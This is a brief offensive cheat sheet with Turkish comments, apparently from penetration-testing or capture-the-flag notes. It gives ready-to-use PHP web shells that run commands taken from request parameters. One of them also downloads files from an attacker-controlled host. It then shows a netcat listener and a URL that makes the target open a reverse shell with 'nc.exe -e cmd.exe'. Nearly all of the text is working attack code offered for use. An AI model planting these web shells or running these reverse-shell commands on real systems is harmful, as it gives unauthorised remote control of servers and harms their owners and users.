#PHP
----------------------------------------------------------------------------------------------------------

<?php system($_GET["cmd"]); ?>
<?php echo shell_exec($_GET["cmd"]); ?>

//Kod yüklemek / yürütmek için güvenilir, basit PHP kabuğu;

if (isset($_REQUEST['fupload'])) {
  file_put_contents($_REQUEST['fupload'], file_get_contents("http://10.10.16.10:8000/" . $_REQUEST['fupload']));
};

if (isset($_REQUEST['fexec'])) {
  echo "<pre>" . shell_exec($_REQUEST['fexec']) . "</pre>";
};

//Dinleyiciyi başlat;

nc -lvp 1234

//Çalıştır ve shelli yakala;

http://10.10.10.9/catch.php?fexec=nc.exe 10.10.16.10 1234 -e cmd.exe```
